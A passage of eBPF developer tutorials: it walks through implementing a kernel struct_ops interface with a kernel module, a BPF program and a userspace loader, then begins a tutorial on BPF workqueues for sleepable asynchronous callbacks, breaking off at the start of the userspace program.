
eBPF has traditionally addressed these issues for tracing, networking, and security by providing a safe, sandboxed environment. However, most eBPF programs are attached to existing hooks (like tracepoints, kprobes, or XDP) and react to events. They don't typically implement the core logic of a kernel subsystem.

The Solution: Implementing Kernel Operations with BPF

BPF struct_ops bridges this gap. It allows a BPF program to implement the functions within a struct_ops—a common pattern in the kernel where a structure holds function pointers for a set of operations. Instead of these pointers pointing to functions compiled into the kernel or a module, they can point to BPF programs.

This is a paradigm shift. It's no longer just about observing or filtering; it's about implementing. Imagine a kernel subsystem that defines a set of operations like open, read, write. With struct_ops, you can write BPF programs that serve as the implementation for these very functions.

This approach is similar in spirit to how kfuncs allow developers to extend the capabilities of BPF. With kfuncs, we can add custom helper functions to the BPF runtime by defining them in a kernel module. With struct_ops, we take this a step further: we define a whole new set of attach points for BPF programs, effectively creating a custom, BPF-programmable subsystem within the kernel.

The benefits are immense:

Dynamic Implementation: You can load, update, and unload the BPF programs implementing the subsystem logic on the fly, without restarting the kernel or the application.
Safety: The BPF verifier ensures that the BPF programs are safe to run, preventing common pitfalls like infinite loops, out-of-bounds memory access, and system crashes.
Flexibility: The logic is in the BPF program, which can be developed and updated independently of the kernel module that defines the struct_ops interface.
Programmability: Userspace applications can interact with and control the BPF programs, allowing for dynamic configuration and control of the kernel subsystem's behavior.

In this tutorial, we will walk through a practical example of this pattern. We'll start with a kernel module that defines a new struct_ops type, and then we'll write a BPF program to implement its functions.

The Kernel Module: Defining the Subsystem Interface

The first step is to create a kernel module that defines our new BPF-programmable subsystem. This module doesn't need to contain much logic itself. Its primary role is to define a struct_ops type and register it with the kernel, creating a new attachment point for BPF programs. It also provides a mechanism to trigger the operations, which in our case will be a simple proc file.

This approach is powerful because it separates the interface definition (in the kernel module) from the implementation (in the BPF program). The kernel module is stable and minimal, while the complex, dynamic logic resides in the BPF program, which can be updated at any time.

Complete Kernel Module: `module/hello.c`

Here is the complete source code for our kernel module. It defines a struct_ops named bpf_testmod_ops with three distinct operations that our BPF program will later implement.

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/bpf.h>
#include <linux/btf.h>
#include <linux/btf_ids.h>
#include <linux/proc_fs.h>
#include <linux/seq_file.h>
#include <linux/bpf_verifier.h>

/* Define our custom struct_ops operations */
struct bpf_testmod_ops {
    int (*test_1)(void);
    int (*test_2)(int a, int b);
    int (*test_3)(const char *buf, int len);
};

/* Global instance that BPF programs will implement */
static struct bpf_testmod_ops __rcu *testmod_ops;

/* Proc file to trigger the struct_ops */
static struct proc_dir_entry *trigger_file;

/* CFI stub functions - required for struct_ops */
static int bpf_testmod_ops__test_1(void)
{
    return 0;
}

static int bpf_testmod_ops__test_2(int a, int b)
{
    return 0;
}

static int bpf_testmod_ops__test_3(const char *buf, int len)
{
    return 0;
}

/* CFI stubs structure */
static struct bpf_testmod_ops __bpf_ops_bpf_testmod_ops = {
    .test_1 = bpf_testmod_ops__test_1,
    .test_2 = bpf_testmod_ops__test_2,
    .test_3 = bpf_testmod_ops__test_3,
};

/* BTF and verifier callbacks */
static int bpf_testmod_ops_init(struct btf *btf)
{
    /* Initialize BTF if needed */
    return 0;
}

static bool bpf_testmod_ops_is_valid_access(int off, int size,
                        enum bpf_access_type type,
                        const struct bpf_prog *prog,
                        struct bpf_insn_access_aux *info)
{
    /* Allow all accesses for now */
    return true;
}

/* Allow specific BPF helpers to be used in struct_ops programs */
static const struct bpf_func_proto *
bpf_testmod_ops_get_func_proto(enum bpf_func_id func_id,
                   const struct bpf_prog *prog)
{
    /* Use base func proto which includes trace_printk and other basic helpers */
    return bpf_base_func_proto(func_id, prog);
}

static const struct bpf_verifier_ops bpf_testmod_verifier_ops = {
    .is_valid_access = bpf_testmod_ops_is_valid_access,
    .get_func_proto = bpf_testmod_ops_get_func_proto,
};

static int bpf_testmod_ops_init_member(const struct btf_type *t,
                       const struct btf_member *member,
                       void *kdata, const void *udata)
{
    /* No special member initialization needed */
    return 0;
}

/* Registration function */
static int bpf_testmod_ops_reg(void *kdata, struct bpf_link *link)
{
    struct bpf_testmod_ops *ops = kdata;

    /* Only one instance at a time */
    if (cmpxchg(&testmod_ops, NULL, ops) != NULL)
        return -EEXIST;

    pr_info("bpf_testmod_ops registered\n");
    return 0;
}

/* Unregistration function */
static void bpf_testmod_ops_unreg(void *kdata, struct bpf_link *link)
{
    struct bpf_testmod_ops *ops = kdata;

    if (cmpxchg(&testmod_ops, ops, NULL) != ops) {
        pr_warn("bpf_testmod_ops: unexpected unreg\n");
        return;
    }

    pr_info("bpf_testmod_ops unregistered\n");
}

/* Struct ops definition */
static struct bpf_struct_ops bpf_testmod_ops_struct_ops = {
    .verifier_ops = &bpf_testmod_verifier_ops,
    .init = bpf_testmod_ops_init,
    .init_member = bpf_testmod_ops_init_member,
    .reg = bpf_testmod_ops_reg,
    .unreg = bpf_testmod_ops_unreg,
    .cfi_stubs = &__bpf_ops_bpf_testmod_ops,
    .name = "bpf_testmod_ops",
    .owner = THIS_MODULE,
};

/* Proc file write handler to trigger struct_ops */
static ssize_t trigger_write(struct file *file, const char __user *buf,
                 size_t count, loff_t *pos)
{
    struct bpf_testmod_ops *ops;
    char kbuf[64];
    int ret = 0;

    if (count >= sizeof(kbuf))
        count = sizeof(kbuf) - 1;

    if (copy_from_user(kbuf, buf, count))
        return -EFAULT;

    kbuf[count] = '\0';

    rcu_read_lock();
    ops = rcu_dereference(testmod_ops);
    if (ops) {
        pr_info("Calling struct_ops callbacks:\n");

        if (ops->test_1) {
            ret = ops->test_1();
            pr_info("test_1() returned: %d\n", ret);
        }

        if (ops->test_2) {
            ret = ops->test_2(10, 20);
            pr_info("test_2(10, 20) returned: %d\n", ret);
        }

        if (ops->test_3) {
            ops->test_3(kbuf, count);
            pr_info("test_3() called with buffer\n");
        }
    } else {
        pr_info("No struct_ops registered\n");
    }
    rcu_read_unlock();

    return count;
}

static const struct proc_ops trigger_proc_ops = {
    .proc_write = trigger_write,
};

static int __init testmod_init(void)
{
    int ret;

    /* Register the struct_ops */
    ret = register_bpf_struct_ops(&bpf_testmod_ops_struct_ops, bpf_testmod_ops);
    if (ret) {
        pr_err("Failed to register struct_ops: %d\n", ret);
        return ret;
    }

    /* Create proc file for triggering */
    trigger_file = proc_create("bpf_testmod_trigger", 0222, NULL, &trigger_proc_ops);
    if (!trigger_file) {
        /* Note: No unregister function available in this kernel version */
        return -ENOMEM;
    }

    pr_info("bpf_testmod loaded with struct_ops support\n");
    return 0;
}

static void __exit testmod_exit(void)
{
    proc_remove(trigger_file);
    /* Note: struct_ops unregister happens automatically on module unload */
    pr_info("bpf_testmod unloaded\n");
}

module_init(testmod_init);
module_exit(testmod_exit);

MODULE_LICENSE("GPL");
MODULE_AUTHOR("eBPF Example");
MODULE_DESCRIPTION("BPF struct_ops test module");
MODULE_VERSION("1.0");

Understanding the Kernel Module Code

This module may seem complex, but its structure is logical and serves a clear purpose: to safely expose a new programmable interface to the BPF subsystem. Let's break it down.

First, we define the structure of our new operations. This is a simple C struct containing function pointers. This struct bpf_testmod_ops is the interface that our BPF program will implement. Each function pointer defines a "slot" that a BPF program can fill.

struct bpf_testmod_ops {
    int (*test_1)(void);
    int (*test_2)(int a, int b);
    int (*test_3)(const char *buf, int len);
};

Next, we have the core bpf_struct_ops definition. This is a special kernel structure that describes our new struct_ops type to the BPF system. It's the glue that connects our custom bpf_testmod_ops to the BPF infrastructure.

static struct bpf_struct_ops bpf_testmod_ops_struct_ops = {
    .verifier_ops = &bpf_testmod_verifier_ops,
    .init = bpf_testmod_ops_init,
    .init_member = bpf_testmod_ops_init_member,
    .reg = bpf_testmod_ops_reg,
    .unreg = bpf_testmod_ops_unreg,
    .cfi_stubs = &__bpf_ops_bpf_testmod_ops,
    .name = "bpf_testmod_ops",
    .owner = THIS_MODULE,
};

This structure is filled with callbacks that the kernel will use to manage our struct_ops:

.reg and .unreg: These are registration and unregistration callbacks. The kernel invokes .reg when a BPF program tries to attach an implementation for bpf_testmod_ops. Our implementation uses cmpxchg to ensure only one BPF program can be attached at a time. .unreg is called when the BPF program is detached.
.verifier_ops: This points to a structure of callbacks for the BPF verifier. It allows us to customize how the verifier treats BPF programs attached to this struct_ops. For example, we can control which helper functions are allowed. In our case, we use bpf_base_func_proto to allow a basic set of helpers, including bpf_printk, which is useful for debugging.
.init and .init_member: These are for BTF (BPF Type Format) initialization. They are required for the kernel to understand the types and layout of our struct_ops.
.name and .owner: These identify our struct_ops and tie it to our module, ensuring proper reference counting so the module isn't unloaded while a BPF program is still attached.

The module's testmod_init function is where the magic starts. It calls register_bpf_struct_ops, passing our definition. This makes the kernel aware of the new bpf_testmod_ops type, and from this point on, BPF programs can target it.

Finally, to make this demonstrable, the module creates a file in the proc filesystem: /proc/bpf_testmod_trigger. When a userspace program writes to this file, the trigger_write function is called. This function checks if a BPF program has registered an implementation for testmod_ops. If so, it calls the function pointers (test_1, test_2, test_3), which will execute the code in our BPF program. This provides a simple way to invoke the BPF-implemented operations from userspace. The use of RCU (rcu_read_lock, rcu_dereference) ensures that we can safely access the testmod_ops pointer even if it's being updated concurrently.

The BPF Program: Implementing the Operations

With the kernel module in place defining the what (the bpf_testmod_ops interface), we can now write a BPF program to define the how (the actual implementation of those operations). This BPF program will contain the logic that executes when the test_1, test_2, and test_3 functions are called from the kernel.

Complete BPF Program: `struct_ops.bpf.c`

This program provides the concrete implementations for the function pointers in bpf_testmod_ops.

/* SPDX-License-Identifier: GPL-2.0 */
#include <vmlinux.h>
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h>
#include "module/bpf_testmod.h"

char _license[] SEC("license") = "GPL";

/* Implement the struct_ops callbacks */
SEC("struct_ops/test_1")
int BPF_PROG(bpf_testmod_test_1)
{
    bpf_printk("BPF test_1 called!\n");
    return 42;
}

SEC("struct_ops/test_2")
int BPF_PROG(bpf_testmod_test_2, int a, int b)
{
    int result = a + b;
    bpf_printk("BPF test_2 called: %d + %d = %d\n", a, b, result);
    return result;
}

SEC("struct_ops/test_3")
int BPF_PROG(bpf_testmod_test_3, const char *buf, int len)
{
    char read_buf[64] = {0};
    int read_len = len < sizeof(read_buf) ? len : sizeof(read_buf) - 1;

    bpf_printk("BPF test_3 called with buffer length %d\n", len);

    /* Safely read from kernel buffer using bpf_probe_read_kernel */
    if (buf && read_len > 0) {
        long ret = bpf_probe_read_kernel(read_buf, read_len, buf);
        if (ret == 0) {
            /* Successfully read buffer - print first few characters */
            bpf_printk("Buffer content: '%c%c%c%c'\n",
                   read_buf[0], read_buf[1], read_buf[2], read_buf[3]);
            bpf_printk("Full buffer: %s\n", read_buf);
        } else {
            bpf_printk("Failed to read buffer, ret=%ld\n", ret);
        }
    }

    return len;
}

/* Define the struct_ops map */
SEC(".struct_ops")
struct bpf_testmod_ops testmod_ops = {
    .test_1 = (void *)bpf_testmod_test_1,
    .test_2 = (void *)bpf_testmod_test_2,
    .test_3 = (void *)bpf_testmod_test_3,
};

Understanding the BPF Code

The BPF code is remarkably straightforward, which is a testament to the power of the struct_ops abstraction.

Each function in the BPF program corresponds to one of the operations defined in the kernel module's bpf_testmod_ops struct. The magic lies in the SEC annotations:

SEC("struct_ops/test_1"): This tells the BPF loader that the bpf_testmod_test_1 program is an implementation for a struct_ops operation. The name after the slash isn't strictly enforced to match the function name, but it's a good convention. The key part is the struct_ops prefix.

The implementations themselves are simple:

bpf_testmod_test_1: This function takes no arguments, prints a message to the kernel trace log using bpf_printk, and returns the integer 42.
bpf_testmod_test_2: This function takes two integers, a and b, calculates their sum, prints the operation and result, and returns the sum.
bpf_testmod_test_3: This function demonstrates handling data from userspace. It receives a character buffer and its length. It uses bpf_probe_read_kernel to safely copy the data from the buffer passed by the kernel module into a local buffer on the BPF stack. This is a crucial safety measure, as BPF programs cannot directly access arbitrary kernel memory pointers. After reading, it prints the content.

The final piece is the struct_ops map itself:

SEC(".struct_ops")
struct bpf_testmod_ops testmod_ops = {
    .test_1 = (void *)bpf_testmod_test_1,
    .test_2 = (void *)bpf_testmod_test_2,
    .test_3 = (void *)bpf_testmod_test_3,
};

This is the most critical part for linking everything together.

SEC(".struct_ops"): This special section identifies the following data structure as a struct_ops map.
struct bpf_testmod_ops testmod_ops: We declare a variable named testmod_ops of the type struct bpf_testmod_ops. The name of this variable is important. It must match the name field in the bpf_struct_ops definition within the kernel module (.name = "bpf_testmod_ops"). This is how libbpf knows which kernel struct_ops this BPF program intends to implement.
The structure is initialized by assigning the BPF programs (bpf_testmod_test_1, etc.) to the corresponding function pointers. This maps our BPF functions to the "slots" in the struct_ops interface.

When the userspace loader attaches this struct_ops, libbpf and the kernel work together to find the bpf_testmod_ops registered by our kernel module and link these BPF programs as its implementation.

The Userspace Loader: Attaching and Triggering

The final component is the userspace program. Its job is to load the BPF program, attach it to the struct_ops defined by the kernel module, and then trigger the operations to demonstrate that everything is working.

Complete Userspace Program: `struct_ops.c`

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <bpf/bpf.h>
#include <bpf/libbpf.h>

#include "struct_ops.skel.h"

static volatile bool exiting = false;

void handle_signal(int sig) {
    exiting = true;
}

static int trigger_struct_ops(const char *message) {
    int fd, ret;

    fd = open("/proc/bpf_testmod_trigger", O_WRONLY);
    if (fd < 0) {
        perror("open /proc/bpf_testmod_trigger");
        return -1;
    }

    ret = write(fd, message, strlen(message));
    if (ret < 0) {
        perror("write");
        close(fd);
        return -1;
    }

    close(fd);
    return 0;
}

int main(int argc, char **argv) {
    struct struct_ops_bpf *skel;
    struct bpf_link *link;
    int err;

    signal(SIGINT, handle_signal);
    signal(SIGTERM, handle_signal);

    /* Open BPF application */
    skel = struct_ops_bpf__open();
    if (!skel) {
        fprintf(stderr, "Failed to open BPF skeleton\n");
        return 1;
    }

    /* Load BPF programs */
    err = struct_ops_bpf__load(skel);
    if (err) {
        fprintf(stderr, "Failed to load BPF skeleton: %d\n", err);
        goto cleanup;
    }

    /* Register struct_ops */
    link = bpf_map__attach_struct_ops(skel->maps.testmod_ops);
    if (!link) {
        fprintf(stderr, "Failed to attach struct_ops\n");
        err = -1;
        goto cleanup;
    }

    printf("Successfully loaded and attached BPF struct_ops!\n");
    printf("Triggering struct_ops callbacks...\n");

    /* Trigger the struct_ops by writing to proc file */
    if (trigger_struct_ops("Hello from userspace!") < 0) {
        printf("Failed to trigger struct_ops - is the kernel module loaded?\n");
        printf("Load it with: sudo insmod module/hello.ko\n");
    } else {
        printf("Triggered struct_ops successfully! Check dmesg for output.\n");
    }

    printf("\nPress Ctrl-C to exit...\n");

    /* Main loop - trigger periodically */
    while (!exiting) {
        sleep(2);
        if (!exiting && trigger_struct_ops("Periodic trigger") == 0) {
            printf("Triggered struct_ops again...\n");
        }
    }

    printf("\nDetaching struct_ops...\n");
    bpf_link__destroy(link);

cleanup:
    struct_ops_bpf__destroy(skel);
    return err < 0 ? -err : 0;
}

Understanding the Userspace Code

The userspace code orchestrates the entire process.

Signal Handling: It sets up a signal handler for SIGINT and SIGTERM to allow for a graceful exit. This is crucial for struct_ops because we need to ensure the BPF program is detached properly.
Open and Load: It uses the standard libbpf skeleton API to open and load the BPF application (struct_ops_bpf__open() and struct_ops_bpf__load()). This loads the BPF programs and the struct_ops map into the kernel.
Attach struct_ops: The key step is the attachment:
```
link = bpf_map__attach_struct_ops(skel->maps.testmod_ops);
```
This libbpf function does the heavy lifting. It takes the struct_ops map from our BPF skeleton (skel->maps.testmod_ops) and asks the kernel to link it to the corresponding struct_ops definition (which it finds by the name "bpf_testmod_ops"). If successful, the kernel's reg callback in our module is executed, and the function pointers in the kernel are now pointing to our BPF programs. The function returns a bpf_link, which represents the active attachment.
Triggering: The trigger_struct_ops function simply opens the /proc/bpf_testmod_trigger file and writes a message to it. This action invokes the trigger_write handler in our kernel module, which in turn calls the BPF-implemented operations.
Cleanup: When the user presses Ctrl-C, the exiting flag is set, the loop terminates, and bpf_link__destroy(link) is called. This is the counterpart to the attach step. It detaches the BPF programs, causing the kernel to call the unreg callback in our module. This cleans up the link and decrements the module's reference count, allowing it to be unloaded cleanly. If this step is skipped (e.g., by killing the process with -9), the module will remain "in use" until the kernel's garbage collection cleans up the link, which can take time.

Compilation and Execution

Now that we have all three components—the kernel module, the BPF program, and the userspace loader—let's compile and run the example to see struct_ops in action.

1. Build the Kernel Module

First, navigate to the module directory and compile the kernel module. This requires having the kernel headers installed for your current kernel version.

cd module
make
cd ..

This will produce a hello.ko file, which is our compiled kernel module.

2. Load the Kernel Module

Load the module into the kernel using insmod. This will register our bpf_testmod_ops struct_ops type and create the /proc/bpf_testmod_trigger file.

sudo insmod module/hello.ko

You can verify that the module loaded successfully by checking the kernel log:

dmesg | tail -n 1

You should see a message like: bpf_testmod loaded with struct_ops support.

3. Build and Run the eBPF Application

Next, compile and run the userspace loader, which will also compile the BPF program.

make
sudo ./struct_ops

Upon running, the userspace application will:

Load the BPF programs.
Attach the BPF implementation to the bpf_testmod_ops struct_ops.
Write to /proc/bpf_testmod_trigger to invoke the BPF functions.

You should see output in your terminal like this:

Successfully loaded and attached BPF struct_ops!
Triggering struct_ops callbacks...
Triggered struct_ops successfully! Check dmesg for output.

Press Ctrl-C to exit...
Triggered struct_ops again...

4. Check the Kernel Log for BPF Output

While the userspace program is running, open another terminal and watch the kernel log to see the output from our BPF programs.

sudo dmesg -w

Every time the proc file is written to, you will see messages printed by the BPF programs via bpf_printk:

[ ... ] bpf_testmod_ops registered
[ ... ] Calling struct_ops callbacks:
[ ... ] BPF test_1 called!
[ ... ] test_1() returned: 42
[ ... ] BPF test_2 called: 10 + 20 = 30
[ ... ] test_2(10, 20) returned: 30
[ ... ] BPF test_3 called with buffer length 21
[ ... ] Buffer content: 'Hell'
[ ... ] Full buffer: Hello from userspace!
[ ... ] test_3() called with buffer

This output confirms that the calls from the kernel module are being correctly dispatched to our BPF programs.

5. Clean Up

When you are finished, press Ctrl-C in the terminal running ./struct_ops. The program will gracefully detach the BPF link. Then, you can unload the kernel module.

sudo rmmod hello

Finally, clean up the build artifacts:

make clean
cd module
make clean

Note on Unloading the Module: Gracefully stopping the userspace program is important. It ensures bpf_link__destroy() is called, which allows the kernel module's reference count to be decremented. If the userspace process is killed abruptly (e.g., with kill -9), the kernel module may remain "in use," and rmmod will fail until the BPF link is garbage collected by the kernel, which can take some time.

Troubleshooting Common Issues

When working with advanced features like struct_ops, which involve kernel modules, BTF, and the BPF verifier, you may encounter some tricky issues. This section covers common problems and their solutions, based on the development process of this example.

Issue 1: Failed to find BTF for `struct_ops`

Symptom: The userspace loader fails with an error like:

libbpf: failed to find BTF info for struct_ops/bpf_testmod_ops
Failed to attach struct_ops

Root Cause: This error means the kernel module (hello.ko) was compiled without the necessary BTF (BPF Type Format) information. The BPF system relies on BTF to understand the structure and types defined in the module, which is essential for linking the BPF program to the struct_ops.

Solution:

Ensure vmlinux with BTF is available: The kernel build system needs access to the vmlinux file corresponding to your running kernel to generate BTF for external modules. This file is often not available by default. You may need to copy it from /sys/kernel/btf/vmlinux or build it from your kernel source. A common location for the build system to look is /lib/modules/$(uname -r)/build/vmlinux.
Ensure pahole is up-to-date: BTF generation depends on the pahole tool (part of the dwarves package). Older versions of pahole may lack the features needed for modern BTF generation. Ensure you have pahole v1.16 or newer. If your distribution's version is too old, you may need to compile it from source.
Rebuild the module: After ensuring the dependencies are met, rebuild the kernel module. The Makefile for this example already includes the -g flag, which instructs the compiler to generate debug information that pahole uses to create BTF.

You can verify that BTF information is present in your module with readelf:

readelf -S module/hello.ko | grep .BTF

You should see sections named .BTF and .BTF.ext, indicating that BTF data has been embedded.

Issue 2: Kernel Panic on Module Load

Symptom: The system crashes (kernel panic) immediately after you run sudo insmod hello.ko. The dmesg log might show a NULL pointer dereference inside register_bpf_struct_ops.

Root Cause: The kernel's struct_ops registration logic expects certain callback pointers in the bpf_struct_ops structure to be non-NULL. In older kernel versions or certain configurations, if callbacks like .verifier_ops, .init, or .init_member are missing, the kernel may dereference a NULL pointer, causing a panic. The kernel's code doesn't always perform defensive NULL checks.

Solution: Always provide all required callbacks in your bpf_struct_ops definition, even if they are just empty functions.

// In module/hello.c
static const struct bpf_verifier_ops bpf_testmod_verifier_ops = {
    .is_valid_access = bpf_testmod_ops_is_valid_access,
    .get_func_proto = bpf_testmod_ops_get_func_proto,
};

static struct bpf_struct_ops bpf_testmod_ops_struct_ops = {
    .verifier_ops = &bpf_testmod_verifier_ops,  // REQUIRED
    .init = bpf_testmod_ops_init,              // REQUIRED
    .init_member = bpf_testmod_ops_init_member, // REQUIRED
    .reg = bpf_testmod_ops_reg,
    .unreg = bpf_testmod_ops_unreg,
    /* ... */
};

By explicitly defining these callbacks, you prevent the kernel from attempting to call a NULL function pointer.

Issue 3: BPF Program Fails to Load with "Invalid Argument"

Symptom: The userspace loader fails with an error indicating that a BPF helper function is not allowed.

libbpf: prog 'bpf_testmod_test_1': BPF program load failed: Invalid argument
program of this type cannot use helper bpf_trace_printk#6

Root Cause: BPF programs of type struct_ops run in a different kernel context than tracing programs (like kprobes or tracepoints). As a result, they are subject to a different, often more restrictive, set of allowed helper functions. The bpf_trace_printk helper (which bpf_printk is a macro for) is a tracing helper and is not allowed by default in struct_ops programs.

Solution: While you can't use bpf_printk by default, you can explicitly allow it for your struct_ops type. This is done in the kernel module by implementing the .get_func_proto callback in your bpf_verifier_ops.

// In module/hello.c
static const struct bpf_func_proto *
bpf_testmod_ops_get_func_proto(enum bpf_func_id func_id,
                   const struct bpf_prog *prog)
{
    /* Use base func proto which includes trace_printk and other basic helpers */
    return bpf_base_func_proto(func_id, prog);
}

static const struct bpf_verifier_ops bpf_testmod_verifier_ops = {
    .is_valid_access = bpf_testmod_ops_is_valid_access,
    .get_func_proto = bpf_testmod_ops_get_func_proto, // Add this line
};

The bpf_base_func_proto function provides access to a set of common, basic helpers, including bpf_trace_printk. By adding this to our verifier operations, we tell the BPF verifier that programs attached to bpf_testmod_ops are permitted to use these helpers. This makes debugging with bpf_printk possible.

Summary

In this tutorial, we explored the powerful capabilities of BPF struct_ops by moving beyond common examples. We demonstrated a robust pattern for extending the kernel: creating a minimal kernel module to define a new, BPF-programmable subsystem interface, and then providing the full, complex implementation in a safe, updatable BPF program. This approach combines the extensibility of kernel modules with the safety and flexibility of eBPF.

We saw how the kernel module registers a struct_ops type, how the BPF program implements the required functions, and how a userspace loader attaches this implementation and triggers its execution. This architecture opens the door to implementing a wide range of kernel-level features in BPF, from custom network protocols and security policies to new filesystem behaviors, all while maintaining system stability and avoiding the need to recompile the kernel.

If you'd like to dive deeper into eBPF, check out our tutorial repository at https://github.com/eunomia-bpf/bpf-developer-tutorial or visit our website at https://eunomia.dev/tutorials/.

References

Kernel Source for struct_ops: The implementation can be found in kernel/bpf/bpf_struct_ops.c in the Linux source tree.
Kernel Test Module for struct_ops: The official kernel self-test module provides a reference implementation: tools/testing/selftests/bpf/test_kmods/bpf_testmod.c.
BPF Documentation: The official BPF documentation in the kernel source: https://www.kernel.org/doc/html/latest/bpf/

eBPF Tutorial: BPF Workqueues for Asynchronous Sleepable Tasks

云微 — Tue, 20 Jan 2026 07:20:47 +0000

Ever needed your eBPF program to sleep, allocate memory, or wait for device I/O? Traditional eBPF programs run in restricted contexts where blocking operations crash the system. But what if your HID device needs timing delays between injected key events, or your cleanup routine needs to sleep while freeing resources?

This is what BPF Workqueues enable. Created by Benjamin Tissoires at Red Hat in 2024 for HID-BPF device handling, workqueues let you schedule asynchronous work that runs in process context where sleeping and blocking operations are allowed. In this tutorial, we'll explore why workqueues were created, how they differ from timers, and build a complete example demonstrating async callback execution.

The complete source code: https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_wq

Introduction to BPF Workqueues: Solving the Sleep Problem

The Problem: When eBPF Can't Sleep

Before BPF workqueues existed, developers had bpf_timer for deferred execution. Timers work great for scheduling callbacks after a delay, perfect for updating counters or triggering periodic events. But there's a fundamental limitation that made timers unusable for certain critical use cases: bpf_timer runs in softirq (software interrupt) context.

Softirq context has strict rules enforced by the kernel. You cannot sleep or wait for I/O - any attempt to do so will cause kernel panics or deadlocks. You cannot allocate memory using kzalloc() with GFP_KERNEL flag because memory allocation might need to wait for pages. You cannot communicate with hardware devices that require waiting for responses. Essentially, you cannot perform any blocking operations that might cause the CPU to wait.

This limitation became a real problem for Benjamin Tissoires at Red Hat when he was developing HID-BPF in 2023. HID devices (keyboards, mice, tablets, game controllers) frequently need operations that timers simply can't handle. Imagine implementing keyboard macro functionality where pressing F1 types "hello" - you need 10ms delays between each keystroke for the system to properly process events. Or consider a device with buggy firmware that needs re-initialization after system wake - you must send commands and wait for hardware responses. Timer callbacks in softirq context can't do any of this.

As Benjamin Tissoires explained in his kernel patches: "I need something similar to bpf_timers, but not in soft IRQ context... the bpf_timer functionality would prevent me to kzalloc and wait for the device."

The Solution: Process Context Execution

In early 2024, Benjamin proposed and developed bpf_wq - essentially "bpf_timer but in process context instead of softirq." The kernel community merged it into Linux v6.10+ in April 2024. The key insight is simple but powerful: by running callbacks in process context (through the kernel's workqueue infrastructure), BPF programs gain access to the full range of kernel operations.

Here's what changes with process context:

Feature	bpf_timer (softirq)	bpf_wq (process)
Can sleep?	❌ No - will crash	✅ Yes - safe to sleep
Memory allocation	❌ Limited flags only	✅ Full `kzalloc()` support
Device I/O	❌ Cannot wait	✅ Can wait for responses
Blocking operations	❌ Prohibited	✅ Fully supported
Latency	Very low (microseconds)	Higher (milliseconds)
Use case	Time-critical fast path	Sleepable slow path

Workqueues enable the classic "fast path + slow path" pattern. Your eBPF program handles performance-critical operations immediately in the fast path, then schedules expensive cleanup or I/O operations to run asynchronously in the slow path. The fast path stays responsive while the slow path gets the capabilities it needs.

Real-World Applications

The applications span multiple domains. HID device handling was the original motivation - injecting keyboard macros with timing delays, fixing broken device firmware dynamically without kernel drivers, re-initializing devices after wake from sleep, transforming input events on the fly. All these require sleepable operations that only workqueues can provide.

Network packet processing benefits from async cleanup patterns. Your XDP program enforces rate limits and drops packets in the fast path (non-blocking), while a workqueue cleans up stale tracking entries in the background. This prevents memory leaks without impacting packet processing performance.

Security monitoring can apply fast rules immediately, then use workqueues to query reputation databases or external threat intelligence services. The fast path makes instant decisions while the slow path updates policies based on complex analysis.

Resource cleanup defers expensive operations. Instead of blocking the main code path while freeing memory, closing connections, or compacting data structures, you schedule a workqueue to handle cleanup in the background.

Implementation: Simple Workqueue Test

Let's build a complete example that demonstrates the workqueue lifecycle. We'll create a program that triggers on the unlink syscall, schedules async work, and verifies that both the main path and workqueue callback execute correctly.

Complete BPF Program: wq_simple.bpf.c

// SPDX-License-Identifier: GPL-2.0
/* Simple BPF workqueue example */
#include <vmlinux.h>
#include <bpf/bpf_helpers.h>
#include "bpf_experimental.h"

char LICENSE[] SEC("license") = "GPL";

/* Element with embedded workqueue */
struct elem {
    int value;
    struct bpf_wq work;
};

/* Array to store our element */
struct {
    __uint(type, BPF_MAP_TYPE_ARRAY);
    __uint(max_entries, 1);
    __type(key, int);
    __type(value, struct elem);
} array SEC(".maps");

/* Result variables */
__u32 wq_executed = 0;
__u32 main_executed = 0;

/* Workqueue callback - runs asynchronously in workqueue context */
static int wq_callback(void *map, int *key, void *value)
{
    struct elem *val = value;
    /* This runs later in workqueue context */
    wq_executed = 1;
    val->value = 42; /* Modify the value asynchronously */
    return 0;
}

/* Main program - schedules work */
SEC("fentry/do_unlinkat")
int test_workqueue(void *ctx)
{
    struct elem init = {.value = 0}, *val;
    struct bpf_wq *wq;
    int key = 0;

    main_executed = 1;

    /* Initialize element in map */
    bpf_map_update_elem(&array, &key, &init, 0);

    /* Get element from map */
    val = bpf_map_lookup_elem(&array, &key);
    if (!val)
        return 0;

    /* Initialize workqueue */
    wq = &val->work;
    if (bpf_wq_init(wq, &array, 0) != 0)
        return 0;

    /* Set callback function */
    if (bpf_wq_set_callback(wq, wq_callback, 0))
        return 0;

    /* Schedule work to run asynchronously */
    if (bpf_wq_start(wq, 0))
        return 0;

    return 0;
}

Understanding the BPF Code

The program demonstrates the complete workqueue workflow from initialization through async execution. We start by defining a structure that embeds a workqueue. The struct elem contains both application data (value) and the workqueue handle (struct bpf_wq work). This embedding pattern is critical - the workqueue infrastructure needs to know which map contains the workqueue structure, and embedding it in the map value establishes this relationship.

Our map is a simple array with one entry, chosen for simplicity in this example. In production code, you'd typically use hash maps to track multiple entities, each with its own embedded workqueue. The global variables wq_executed and main_executed serve as test instrumentation, letting userspace verify that both code paths ran.

The workqueue callback shows the signature that all workqueue callbacks must follow: int callback(void *map, int *key, void *value). The kernel invokes this function asynchronously in process context, passing the map containing the workqueue, the key of the entry, and a pointer to the value. This signature gives the callback full context about which element triggered it and access to the element's data. Our callback sets wq_executed = 1 to prove it ran, and modifies val->value = 42 to demonstrate that async modifications persist in the map.

The main program attached to fentry/do_unlinkat triggers whenever the unlink syscall executes. This gives us an easy way to activate the program - userspace just needs to delete a file. We set main_executed = 1 immediately to mark the synchronous path. Then we initialize an element and store it in the map using bpf_map_update_elem(). This is necessary because the workqueue must be embedded in a map entry.

The workqueue initialization follows a three-step sequence. First, bpf_wq_init(wq, &array, 0) initializes the workqueue handle, passing the map that contains it. The verifier uses this information to validate that the workqueue and its container are properly related. Second, bpf_wq_set_callback(wq, wq_callback, 0) registers our callback function. The verifier checks that the callback has the correct signature. Third, bpf_wq_start(wq, 0) schedules the workqueue to execute asynchronously. This call returns immediately - the main program continues executing while the kernel queues the work for later execution in process context.

The flags parameter in all three functions is reserved for future use and should be 0 in current kernels. The pattern allows future extensions without breaking API compatibility.

Complete User-Space Program: wq_simple.c

// SPDX-License-Identifier: GPL-2.0
